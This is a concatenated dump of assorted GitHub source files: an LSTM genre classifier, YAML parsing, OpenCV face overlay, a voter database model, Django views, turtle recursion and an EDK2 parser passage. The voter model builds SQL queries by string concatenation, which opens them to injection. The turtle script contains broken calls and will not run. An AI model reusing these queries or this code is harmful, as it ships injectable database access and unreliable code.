training examples\n for i in range(m):\n\n # Convert the ith training sentence in lower case and split is into words -> get a list of words.\n sentence_words = [x.lower() for x in X[i].split()]\n\n # Initialize j to 0\n j = 0\n\n # Loop over the words in sentence_words\n for w in sentence_words:\n\n # check that the word is within our GloVe dataset, otherwise pass\n if w in word_to_index.keys():\n # Set the (i,j)th entry of X_indices to the index of the correct word.\n X_indices[i, j] = word_to_index[w]\n\n # Increment j to j + 1\n j = j + 1\n else:\n pass\n\n return X_indices\n\ndef read_glove_vecs_only_alpha(glove_file):\n with open(glove_file, 'r', encoding='utf8') as f:\n\n words = set()\n word_to_vec_map = {}\n\n for line in f:\n line = line.strip().split()\n curr_word = line[0]\n\n # only consider words containing alphabetical letters\n if curr_word.isalpha():\n words.add(curr_word)\n word_to_vec_map[curr_word] = np.array(line[1:], dtype=np.float64)\n\n i = 1\n words_to_index = {}\n index_to_words = {}\n\n for w in sorted(words):\n words_to_index[w] = i\n index_to_words[i] = w\n i = i + 1\n\n return words_to_index, index_to_words, word_to_vec_map\n\n\n\n\ndf = pd.read_csv('train.csv', low_memory=False)\nmax_sequence_length = df[\"overview length\"].max()\ndf = df.drop(['imdb_id', 'title','overview','overview length','genres','labels_index'], axis = 1)\ndf[\"features_content\"] = df[\"features_content\"].astype(str).apply(lambda x: preprocessOverview(x))\n\nY = df[df.columns[2:]]\nword_to_index, index_to_word, word_to_vec_map = read_glove_vecs_only_alpha('glove.6B.100d.txt')\n\nX = df['features_content']\nX_indices = sentences_to_indices(X, word_to_index, max_sequence_length)\n\n\nxtrain, xval, ytrain, yval = train_test_split(X_indices, Y, test_size=0.2, random_state=9)\n\ntop_words = 500\n\nx_train = sequence.pad_sequences(xtrain, maxlen=max_sequence_length)\nx_val = sequence.pad_sequences(xval, maxlen=max_sequence_length)\n\n\nembedding_vecor_length = 32\nmodel = Sequential()\nmodel.add(Embedding(top_words, embedding_vecor_length, input_length=max_sequence_length))\nmodel.add(LSTM(100))\nmodel.add(Dense(20, activation='sigmoid'))\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nmodel.fit(x_train, ytrain, epochs=20, batch_size=64)\n\n\nscores = model.evaluate(x_val, yval, verbose=0)\nprint(\"Accuracy: %.2f%%\" % (scores[1]*100))\n\n\n\nmodel_json = model.to_json()\nwith open(r\"C:\\Users\\dasan\\Desktop\\P726(2)\\model_LSTM.json\", \"w+\") as json_file:\n json_file.write(model_json)\n# serialize weights to HDF5\nmodel.save_weights(r\"C:\\Users\\dasan\\Desktop\\P726(2)\\model_LSTM.h5\")\n","repo_name":"thenatzzz/Movie_Genre_Classification_Deeplearning","sub_path":"Algorithm2-3-LSTM-RF/LSTM+Sigmoid_Model/LSTM_model.py","file_name":"LSTM_model.py","file_ext":"py","file_size_in_byte":3895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"26223609255","text":"\"\"\"Defines utilities for parsing YAML input.\"\"\"\nimport logging\nfrom typing import Any, List, Optional\n\nimport yaml\n\nlog = logging.getLogger(__name__)\n\n\ndef get_object_lists(yaml_file) -> Optional[List[List[Any]]]:\n \"\"\"Gets lists of objects from the yaml file.\n\n Assumes the file can have more than one document.\n\n Args:\n yaml_file: name of the yaml file\n Returns:\n List of lists of object read from the file\n \"\"\"\n with open(yaml_file, 'r', encoding='utf-8') as stream:\n return 
get_object_lists_from_stream(stream, yaml_file)\n\n\ndef get_object_lists_from_stream(stream,\n yaml_file) -> Optional[List[List[Any]]]:\n \"\"\"Gets list of objects from the IO stream.\n\n Assumes the file can have more than one document.\n\n Args:\n stream: IO stream\n yaml_file: the name of the file\n Returns:\n List of lists of objects created from file or None if an error occurs\n \"\"\"\n try:\n element_gen = yaml.safe_load_all(stream)\n except yaml.MarkedYAMLError as exception:\n log.error(\"Error in YAML file: %s\", yaml_file)\n mark = exception.problem_mark\n if mark:\n log.error(\"Error: line %s, column %s\", mark.line + 1,\n mark.column + 1)\n else:\n log.error(\"Error: %s\", exception)\n return None\n except yaml.YAMLError as exception:\n log.error(\"Error in YAML file: %s\", yaml_file)\n log.error(\"Error: %s\", exception)\n return None\n else:\n return [*element_gen]\n","repo_name":"naccdata/flywheel-gear-extensions","sub_path":"common/src/python/inputs/yaml.py","file_name":"yaml.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6407447181","text":"import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nfrom winsound import *\r\n\r\nvid = cv2.VideoCapture(0)\r\nspider = cv2.imread('spider.png') \r\nimg_height, img_width, _ = spider.shape\r\nframe_width = vid.get(cv2.CAP_PROP_FRAME_WIDTH )\r\nframe_height = vid.get(cv2.CAP_PROP_FRAME_HEIGHT )\r\nwhile(True):\r\n \r\n # Capture the video frame\r\n # by frame\r\n ret, frame = vid.read()\r\n \r\n face_cascade=cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n gray=cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n faces=face_cascade.detectMultiScale(gray, 1.3, 5)\r\n for (x,y,w,h) in faces:\r\n frame[ y:y+img_height , x:x+img_width ] = spider\r\n roi_gray=gray[y:y+h, x:x+w]\r\n roi_color=frame[y:y+h, x:x+w]\r\n # Display the resulting frame\r\n cv2.imshow('frame', frame)\r\n \r\n # the 'q' button is set as the\r\n # quitting button you may use any\r\n # desired button of your choice\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n \r\n# After the loop release the cap object\r\nvid.release()\r\n# Destroy all the windows\r\ncv2.destroyAllWindows()","repo_name":"koushik2k3/face_recog-spiderman-mask","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"25218143673","text":"#!/usr/bin/python3\n\nfrom typing import List\nimport random\n\nclass Solution:\n def __init__(self, nums: List[int]) -> None:\n self.nums = nums\n\n def reset(self) -> List[int]:\n return self.nums\n\n def shuffle(self) -> List[int]:\n shuffled = self.nums[:]\n for i in range(len(shuffled) - 1, 0, -1):\n j = random.randrange(0, i + 1)\n shuffled[i], shuffled[j] = shuffled[j], shuffled[i]\n return shuffled\n\n\nnums = [1, 2, 3, 4]\nobj = Solution(nums)\nparam_1 = obj.reset()\nprint(param_1)\nparam_2 = obj.shuffle()\nprint(param_2)\n","repo_name":"sharmakajal0/Training","sub_path":"top-interview-questions-easy/design/shuffle_array.py","file_name":"shuffle_array.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"8408142825","text":"import pypyodbc\nimport Constants\nclass VoterModel:\n def __init__(self, voteID, title=\"\", firstName=\"\", middleName=\"\", lastName=\"\", wardNumber=\"\", 
streetName=\"\", area=\"\", city=\"\", district=\"\", state=\"\", dob=None, addressProof=\"\", ageProof=\"\", constituencyID=0, constituencyModel = None, isApproved=0, ssn=\"\", mobileNbr=\"\", emailID=\"\", password=\"\", gender=\"\"):\n self.voteID = voteID\n self.title = title\n self.firstName = firstName\n self.middleName = middleName\n self.lastName = lastName\n self.wardNumber = wardNumber\n self.streetName = streetName\n self.area = area\n self.city = city\n self.district = district\n self.state = state\n self.dob = dob\n self.addressProof = addressProof\n self.ageProof = ageProof\n self.constituencyID = constituencyID\n self.constituencyModel = constituencyModel\n self.isApproved = isApproved\n self.ssn = ssn\n self.mobileNbr = mobileNbr\n self.emailID = emailID\n self.password = password\n self.gender=gender\n \n @staticmethod\n def getVoterByID(rid):\n conn3 = pypyodbc.connect(Constants.connString, autocommit=True)\n cur3 = conn3.cursor()\n \n sqlcmd = \"SELECT voteID, firstName FROM VoterMaster WHERE voteID = '\"+str(rid)+\"'\"\n print(\"DDDDDDDDDDDDDDDDDDDDD\", sqlcmd)\n cur3.execute(sqlcmd)\n row = cur3.fetchone()\n voterModel = None\n if row:\n voterModel = VoterModel(row[0], firstName=row[1])\n return voterModel\n \n \n @staticmethod\n def getVoterByEmailID(emailID):\n conn3 = pypyodbc.connect(Constants.connString, autocommit=True)\n cur3 = conn3.cursor()\n \n sqlcmd = \"SELECT voteID, firstName FROM VoterMaster WHERE emailID = '\"+str(emailID)+\"'\"\n print(\"DDDDDDDDDDDDDDDDDDDDD\", sqlcmd)\n cur3.execute(sqlcmd)\n row = cur3.fetchone()\n voterModel = None\n if row:\n voterModel = VoterModel(row[0], firstName=row[1])\n return voterModel \n","repo_name":"dhruv989/online-voting","sub_path":"E-VotingV2/src/VoterModel.py","file_name":"VoterModel.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28285451281","text":"import os\nfrom wsgiref.util import FileWrapper\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\n\nfrom core.forms import MyUploadForm, ConfigForm\n\n\ndef index(request):\n file_upload_form = MyUploadForm(request.POST, request.FILES)\n return render(request, \"core/index.html\", {'form': file_upload_form})\n\n\ndef handle_uploaded_file(f):\n filename = f.__str__()\n directory = \"uploaded/\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open(directory + filename, 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\n\n\ndef render_main_page(request):\n config_form = ConfigForm()\n upload_form = MyUploadForm()\n if request.method == 'POST':\n handle_uploaded_file(request.FILES['file_'])\n return render(request, 'core/index.html',\n {\n 'form': upload_form,\n 'uploaded': True,\n 'config_form': config_form,\n })\n elif request.method == 'GET':\n config_form = ConfigForm(initial={\n 'config_name': 'default_config_name',\n 'train_start_date': '01-01-2017',\n })\n return render(request, 'core/index.html',\n {\n 'form': upload_form,\n 'uploaded': False,\n 'config_form': config_form,\n })\n\n\nneeded_report_name = 'random_algorithm_report100'\n\n\ndef run_algorithm(request):\n # define which algorithm was chosen and return needed\n algo_name = request.POST[\"algo_name\"]\n config_name = request.POST[\"config_name\"]\n\n ################# GETTING CONFIG PATH ######################\n # Getting path to config\n if config_name == \"config1\":\n config_path = \"100days\"\n elif config_name == 
\"config2\":\n config_path = \"250days\"\n else:\n assert False\n\n from loader import Loader\n ################# RUNNING ALGORITHM ON CONFIG ##############\n # Running needed algorithm using config_path\n if algo_name == \"random_algorithm\":\n # run random algorithm\n # generate random report\n global needed_report_name\n if config_path == \"100days\":\n Loader(config_filename='config100_random.cfg')\n needed_report_name = 'random_algorithm_report100.pdf'\n if config_path == \"250days\":\n Loader(config_filename='config250_random.cfg')\n needed_report_name = 'random_algorithm_report250.pdf'\n\n elif algo_name == \"clever_algorithm\":\n # run clever algorithm\n # generate clever report\n global needed_report_name\n if config_path == \"100days\":\n Loader(config_filename='config100_clever.cfg')\n needed_report_name = 'clever_algorithm_report100.pdf'\n if config_path == \"250days\":\n Loader(config_filename='config250_clever.cfg')\n needed_report_name = 'clever_algorithm_report250.pdf'\n else:\n assert False\n\n print('Run algorithm!')\n\n return HttpResponse('')\n\n\ndef download_file_button_click(request):\n global needed_report_name\n path = \"Framework_src/pdf_reports/\"\n our_report = open(path + needed_report_name, \"r\")\n response = HttpResponse(FileWrapper(our_report),\n content_type=\"application/pdf\")\n response[\"Content-Disposition\"] = 'attachment;filename=' + \\\n needed_report_name\n our_report.close()\n return response\n","repo_name":"FRTP/Landing","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74578360209","text":"expressao = str(input('Digite uma expressão com parêntesis: ')).strip().lower()\nparent_inicial = 0\npos_inicial = []\nparent_final = 0\npos_final = []\nerro = False\nfor pos, c in enumerate(expressao):\n if '(' in c:\n parent_inicial += 1\n pos_inicial.append(pos)\n elif ')' in c:\n parent_final += 1\n pos_final.append(pos)\n''' Prints usados para teste do programa:\nprint(parent_inicial)\nprint(pos_inicial)\nprint(parent_final)\nprint(pos_final)'''\nif parent_inicial != parent_final:\n erro = True\nelse:\n for c in range(0, len(pos_inicial)):\n if pos_inicial[c] > pos_final[c]:\n erro = True\n break\nif erro is True:\n print('A expressão contém um erro nos parêntesis!')\nelse:\n print('A equação está com os parêntesis corretos!')\n","repo_name":"Zeldyy/exercicios-python-cursoemvideo","sub_path":"Exercícios Python/ex083.py","file_name":"ex083.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70250901290","text":"import turtle\n\n\nmy_turtle = turtle.Turtle()\nmy_win = turtle.Screen()\n\ndef draw_spiral(my_turtle, line_len):\n if line_len > 0:\n my_turtle.forward(line_len)\n my_turtle.right(90)\n draw_spiral(my_turtle, line_len-5)\n\n\ndraw_spiral(my_turtle, 100)\nmy_win.exitonclick()\n\n\ndef tree(branch_len, t):\n if branch_len > 5:\n t.forward(branch_len)\n t.right(20)\n tree(branch_len-15, t)\n t.left(40)\n tree(branch_len-10, t)\n t.right(20)\n t.backward(branch_len)\n\ndef main():\n t = turtle.Turtle()\n my_win = turtle.Screen()\n t.left(90)\n t.up()\n t.backward(100)\n t.down()\n t.color(\"green\")\n tree(75, t)\n my_win.exitonclick()\n\n\ndef draw_triangle(points, color):\n t.fillcolro(color)\n t.penup()\n t.goto(points['top'])\n t.pendown()\n t.begin_fill()\n t.goto(points['left'])\n 
t.goto(points['right'])\n t.goto(points['top'])\n t.end_fill()\n\n\n\ndef get_mid(p1, p2):\n return((p1[0] + p2[0]) / 2, (p1[1] + p2[1]) / 2)\n\n\ndef sierpinski(ponits, degree, my_turtle):\n color_map = [\"blue\", \"red\", \"green\", \"white\", \"yellow\", \"violet\", \"orange\"]\n draw_triangle(ponits, color_map[degree], my_turtle)\n if degree > 0:\n sierpinski([points[0], get_mid(points[0], ponits[1]), get_points(ponits[0], points[2])], degree-1, my_turtle)\n sierpinski([points[1], get_mid(points[0], ponits[1]), get_points(ponits[1], points[2])], degree-1, my_turtle)\n sierpinski([points[2], get_mid(points[2], ponits[1]), get_points(ponits[0], points[2])], degree-1, my_turtle)\n\n\ndef main():\n my_turtle = turtle.Turtle()\n my_win = turtle.Screen()\n my_points = [[-100, -50], [0, 100], [100, -50]]\n sierpinski(my_points, 3, my_turtle)\n\nmain()\n\n","repo_name":"chcorophyll/algorithm_4th","sub_path":"PekingUniversity/recursion/turtle.py","file_name":"turtle.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71814842408","text":"# --------------------------------#\n# Limpiar pantalla\nfrom pantallas import *\nlimpiar()\n# --------------------------------#\n\n# Enviar concatenar\ndef miFuncionLLista(lista):\n i = ''\n for elemento in lista:\n i = i + elemento + ' '\n return i\n\n\n\nvalores = miFuncionLLista(['Valor 1', 'Otro valor','3er. Valor'])\nprint(valores)\n\n","repo_name":"terracenter/Cursos","sub_path":"Python/Nicolas/Seccion_8_Contro_de_flujo/44.03.mas_funciones_concatenacion.py","file_name":"44.03.mas_funciones_concatenacion.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"es","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"28727789134","text":"import json\nimport random\n\nfrom copy import deepcopy\nfrom ai_transform.operator.abstract_operator import AbstractOperator\nfrom ai_transform.utils.document import Document\nfrom ai_transform.utils.example_documents import mock_documents, generate_random_label, generate_random_vector\n\n\nclass TestDocumentDiff:\n def test_diff1(self):\n old_documents = mock_documents(3)\n new_documents = deepcopy(old_documents)\n\n expected_diff = []\n\n for document in new_documents:\n new_chunk = {\"label\": generate_random_label(), \"label_chunkvector_\": generate_random_vector()}\n document[\"_chunk_\"].append(new_chunk)\n expected_diff.append({\"_id\": document[\"_id\"], \"_chunk_\": document[\"_chunk_\"]})\n\n diff = AbstractOperator._postprocess(new_documents, old_documents).to_json()\n diff = list(sorted(diff, key=lambda x: x[\"_id\"]))\n expected_diff = list(sorted(expected_diff, key=lambda x: x[\"_id\"]))\n\n assert json.dumps(diff, sort_keys=True) == json.dumps(expected_diff, sort_keys=True)\n\n def test_update_diff(self):\n old_documents = [Document({\"label\": \"yes\"}) for _ in range(5)]\n new_documents = deepcopy(old_documents)\n for document in new_documents:\n document[\"label\"] = \"no\"\n\n diff = AbstractOperator._postprocess(new_documents, old_documents)\n expected_diff = json.dumps({\"label\": \"no\"})\n\n assert all(json.dumps(document.to_json()) == expected_diff for document in diff)\n\n def test_no_diff(self):\n documents = [Document({\"value\": 10})]\n diff = AbstractOperator._postprocess(documents, documents)\n assert not diff\n\n def test_chunk_diff(self):\n old_documents = [Document({\"example_vector_\": [random.random() for _ in range(5)]}) for _ in range(5)]\n 
new_documents = deepcopy(old_documents)\n for document in new_documents:\n document[\"label\"] = \"yes\"\n\n diff = AbstractOperator._postprocess(new_documents, old_documents)\n expected_diff = json.dumps({\"label\": \"yes\"})\n\n assert all(json.dumps(document.to_json()) == expected_diff for document in diff)\n","repo_name":"RelevanceAI/ai-transform","sub_path":"tests/core/test_operator/test_document_diff.py","file_name":"test_document_diff.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"37831757776","text":"import os\nimport tempfile\n\nimport pytest\n\nfrom app import create_app\nfrom models import db\n\n\n@pytest.fixture\ndef client():\n app = create_app()\n db_fd, app.config[\"DATABASE\"] = tempfile.mkstemp()\n app.config[\"TESTING\"] = True\n app.secret_key = \"sekrit!\"\n with app.test_client() as client:\n with app.app_context():\n db.drop_all()\n db.create_all()\n yield client\n os.close(db_fd)\n os.unlink(app.config[\"DATABASE\"])\n","repo_name":"drizzleco/feeds","sub_path":"tests/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30692952387","text":"#%tensorflow_version 2.x # this line is not required unless you are in a notebook\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom IPython.display import clear_output\nfrom six.moves import urllib\n\nimport tensorflow.compat.v2.feature_column as fc\n\nimport tensorflow as tf\n\n# Load dataset.\ndftrain = pd.read_csv('train.csv') # training data\ndfeval = pd.read_csv('eval.csv') # testing data\ny_train = dftrain.pop('survived') # removing survived column and storing it in y_train\ny_eval = dfeval.pop('survived') # as above\n\n\n# distinguish from numerical and categorical data (those who have values different then numbers)\nCATEGORICAL_COLUMNS = ['sex', 'n_siblings_spouses', 'parch', 'class', 'deck',\n 'embark_town', 'alone']\nNUMERIC_COLUMNS = ['age', 'fare']\n\n# columns created from those above\nfeature_columns = []\n\n# iterate over categorical columns and finds all unique values and saves it in fetures_column using ts - tensorflow\nfor feature_name in CATEGORICAL_COLUMNS:\n vocabulary = dftrain[feature_name].unique() # gets a list of all unique values from given feature column\n feature_columns.append(tf.feature_column.categorical_column_with_vocabulary_list(feature_name, vocabulary))\n\n# same for numerical values\nfor feature_name in NUMERIC_COLUMNS:\n feature_columns.append(tf.feature_column.numeric_column(feature_name, dtype=tf.float32))\n\n\n# Creating input function, basically it creates tensorflow DATASET OBJECT on which model trains\ndef make_input_fn(data_df, label_df, num_epochs=10, shuffle=True, batch_size=32):\n def input_function(): # inner function, this will be returned\n ds = tf.data.Dataset.from_tensor_slices((dict(data_df), label_df)) # create tf.data.Dataset object with data and its label\n if shuffle:\n ds = ds.shuffle(1000) # randomize order of data\n ds = ds.batch(batch_size).repeat(num_epochs) # split dataset into batches of 32 and repeat process for number of epochs\n return ds # return a batch of the dataset\n return input_function # return a function object for use\n\n# here we will call the input_function that was returned to us to get a dataset 
object we can feed to the model\n# as arguments - training dataset file and file with 'survived' column\ntrain_input_fn = make_input_fn(dftrain, y_train) \n\n# only one epoch, couse it do not train, just eval, and also don't need to be shuffled\n# as arguments: as above, just testing datasets\neval_input_fn = make_input_fn(dfeval, y_eval, num_epochs=1, shuffle=False) \n\n\n# Creating a model\n# create a linear estimtaor by passing the feature columns created earlier\nlinear_est = tf.estimator.LinearClassifier(feature_columns=feature_columns) \n\n\n# TRAINING model\nlinear_est.train(train_input_fn) # train\nresult = linear_est.evaluate(eval_input_fn) # get model metrics/stats by testing on tetsing data\n\nclear_output() # clears console output\nprint(result['accuracy']) # the result variable is simply a dict of stats about our model, accuracy gives how good is model\n\nresult = list(linear_est.predict(eval_input_fn))\nprint(dfeval.loc[0]) # print person on index\nprint(y_eval.loc[0]) # print if survived or not (0 or 1)\nprint(result[0]['probabilities'][1]) # print what the trained model predict (probabilities on index 0 = died probability, on index 1 survival probability) for person on index ","repo_name":"JakubCzerwiec/Titanic","sub_path":"titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37608541619","text":"## @file\r\n# This file is used to define each component of tools_def.txt file\r\n#\r\n# Copyright (c) 2007 - 2021, Intel Corporation. All rights reserved.
\r\n# SPDX-License-Identifier: BSD-2-Clause-Patent\r\n#\r\n\r\n##\r\n# Import Modules\r\n#\r\nfrom __future__ import absolute_import\r\nimport Common.LongFilePathOs as os\r\nimport re\r\nfrom . import EdkLogger\r\n\r\nfrom .BuildToolError import *\r\nfrom Common.TargetTxtClassObject import TargetTxtDict\r\nfrom Common.LongFilePathSupport import OpenLongFilePath as open\r\nfrom Common.Misc import PathClass\r\nfrom Common.StringUtils import NormPath\r\nimport Common.GlobalData as GlobalData\r\nfrom Common import GlobalData\r\nfrom Common.MultipleWorkspace import MultipleWorkspace as mws\r\nfrom .DataType import TAB_TOD_DEFINES_TARGET, TAB_TOD_DEFINES_TOOL_CHAIN_TAG,\\\r\n TAB_TOD_DEFINES_TARGET_ARCH, TAB_TOD_DEFINES_COMMAND_TYPE\\\r\n , TAB_TOD_DEFINES_FAMILY, TAB_TOD_DEFINES_BUILDRULEFAMILY,\\\r\n TAB_STAR, TAB_TAT_DEFINES_TOOL_CHAIN_CONF\r\n\r\n\r\n##\r\n# Static variables used for pattern\r\n#\r\ngMacroRefPattern = re.compile('(DEF\\([^\\(\\)]+\\))')\r\ngEnvRefPattern = re.compile('(ENV\\([^\\(\\)]+\\))')\r\ngMacroDefPattern = re.compile(\"DEFINE\\s+([^\\s]+)\")\r\ngDefaultToolsDefFile = \"tools_def.txt\"\r\n\r\n## ToolDefClassObject\r\n#\r\n# This class defined content used in file tools_def.txt\r\n#\r\n# @param object: Inherited from object class\r\n# @param Filename: Input value for full path of tools_def.txt\r\n#\r\n# @var ToolsDefTxtDictionary: To store keys and values defined in target.txt\r\n# @var MacroDictionary: To store keys and values defined in DEFINE statement\r\n#\r\nclass ToolDefClassObject(object):\r\n def __init__(self, FileName=None):\r\n self.ToolsDefTxtDictionary = {}\r\n self.MacroDictionary = {}\r\n for Env in os.environ:\r\n self.MacroDictionary[\"ENV(%s)\" % Env] = os.environ[Env]\r\n\r\n if FileName is not None:\r\n self.LoadToolDefFile(FileName)\r\n\r\n ## LoadToolDefFile\r\n #\r\n # Load target.txt file and parse it\r\n #\r\n # @param Filename: Input value for full path of tools_def.txt\r\n #\r\n def LoadToolDefFile(self, FileName):\r\n # set multiple workspace\r\n PackagesPath = os.getenv(\"PACKAGES_PATH\")\r\n mws.setWs(GlobalData.gWorkspace, PackagesPath)\r\n\r\n self.ToolsDefTxtDatabase = {\r\n TAB_TOD_DEFINES_TARGET : [],\r\n TAB_TOD_DEFINES_TOOL_CHAIN_TAG : [],\r\n TAB_TOD_DEFINES_TARGET_ARCH : [],\r\n TAB_TOD_DEFINES_COMMAND_TYPE : []\r\n }\r\n\r\n self.IncludeToolDefFile(FileName)\r\n\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET] = list(set(self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET]))\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG] = list(set(self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]))\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET_ARCH] = list(set(self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET_ARCH]))\r\n\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_COMMAND_TYPE] = list(set(self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_COMMAND_TYPE]))\r\n\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET].sort()\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG].sort()\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET_ARCH].sort()\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_COMMAND_TYPE].sort()\r\n\r\n ## IncludeToolDefFile\r\n #\r\n # Load target.txt file and parse it as if its contents were inside the main file\r\n #\r\n # @param Filename: Input value for full path of tools_def.txt\r\n #\r\n def IncludeToolDefFile(self, FileName):\r\n FileContent = []\r\n if os.path.isfile(FileName):\r\n try:\r\n F = open(FileName, 'r')\r\n FileContent = F.readlines()\r\n except:\r\n EdkLogger.error(\"tools_def.txt parser\", 
FILE_OPEN_FAILURE, ExtraData=FileName)\r\n else:\r\n EdkLogger.error(\"tools_def.txt parser\", FILE_NOT_FOUND, ExtraData=FileName)\r\n\r\n for Index in range(len(FileContent)):\r\n Line = FileContent[Index].strip()\r\n if Line == \"\" or Line[0] == '#':\r\n continue\r\n\r\n if Line.startswith(\"!include\"):\r\n IncFile = Line[8:].strip()\r\n Done, IncFile = self.ExpandMacros(IncFile)\r\n if not Done:\r\n EdkLogger.error(\"tools_def.txt parser\", ATTRIBUTE_NOT_AVAILABLE,\r\n \"Macro or Environment has not been defined\",\r\n ExtraData=IncFile[4:-1], File=FileName, Line=Index+1)\r\n IncFile = NormPath(IncFile)\r\n\r\n if not os.path.isabs(IncFile):\r\n #\r\n # try WORKSPACE\r\n #\r\n IncFileTmp = PathClass(IncFile, GlobalData.gWorkspace)\r\n ErrorCode = IncFileTmp.Validate()[0]\r\n if ErrorCode != 0:\r\n #\r\n # try PACKAGES_PATH\r\n #\r\n IncFileTmp = mws.join(GlobalData.gWorkspace, IncFile)\r\n if not os.path.exists(IncFileTmp):\r\n #\r\n # try directory of current file\r\n #\r\n IncFileTmp = PathClass(IncFile, os.path.dirname(FileName))\r\n ErrorCode = IncFileTmp.Validate()[0]\r\n if ErrorCode != 0:\r\n EdkLogger.error(\"tools_def.txt parser\", FILE_NOT_FOUND, ExtraData=IncFile)\r\n\r\n if isinstance(IncFileTmp, PathClass):\r\n IncFile = IncFileTmp.Path\r\n else:\r\n IncFile = IncFileTmp\r\n\r\n self.IncludeToolDefFile(IncFile)\r\n continue\r\n\r\n NameValuePair = Line.split(\"=\", 1)\r\n if len(NameValuePair) != 2:\r\n EdkLogger.warn(\"tools_def.txt parser\", \"Line %d: not correct assignment statement, skipped\" % (Index + 1))\r\n continue\r\n\r\n Name = NameValuePair[0].strip()\r\n Value = NameValuePair[1].strip()\r\n\r\n if Name == \"IDENTIFIER\":\r\n EdkLogger.debug(EdkLogger.DEBUG_8, \"Line %d: Found identifier statement, skipped: %s\" % ((Index + 1), Value))\r\n continue\r\n\r\n MacroDefinition = gMacroDefPattern.findall(Name)\r\n if MacroDefinition != []:\r\n Done, Value = self.ExpandMacros(Value)\r\n if not Done:\r\n EdkLogger.error(\"tools_def.txt parser\", ATTRIBUTE_NOT_AVAILABLE,\r\n \"Macro or Environment has not been defined\",\r\n ExtraData=Value[4:-1], File=FileName, Line=Index+1)\r\n\r\n MacroName = MacroDefinition[0].strip()\r\n self.MacroDictionary[\"DEF(%s)\" % MacroName] = Value\r\n EdkLogger.debug(EdkLogger.DEBUG_8, \"Line %d: Found macro: %s = %s\" % ((Index + 1), MacroName, Value))\r\n continue\r\n\r\n Done, Value = self.ExpandMacros(Value)\r\n if not Done:\r\n EdkLogger.error(\"tools_def.txt parser\", ATTRIBUTE_NOT_AVAILABLE,\r\n \"Macro or Environment has not been defined\",\r\n ExtraData=Value[4:-1], File=FileName, Line=Index+1)\r\n\r\n List = Name.split('_')\r\n if len(List) != 5:\r\n EdkLogger.verbose(\"Line %d: Not a valid name of definition: %s\" % ((Index + 1), Name))\r\n continue\r\n elif List[4] == TAB_STAR:\r\n EdkLogger.verbose(\"Line %d: '*' is not allowed in last field: %s\" % ((Index + 1), Name))\r\n continue\r\n else:\r\n self.ToolsDefTxtDictionary[Name] = Value\r\n if List[0] != TAB_STAR:\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET] += [List[0]]\r\n if List[1] != TAB_STAR:\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG] += [List[1]]\r\n if List[2] != TAB_STAR:\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TARGET_ARCH] += [List[2]]\r\n if List[3] != TAB_STAR:\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_COMMAND_TYPE] += [List[3]]\r\n if List[4] == TAB_TOD_DEFINES_FAMILY and List[2] == TAB_STAR and List[3] == TAB_STAR:\r\n if TAB_TOD_DEFINES_FAMILY not in self.ToolsDefTxtDatabase:\r\n 
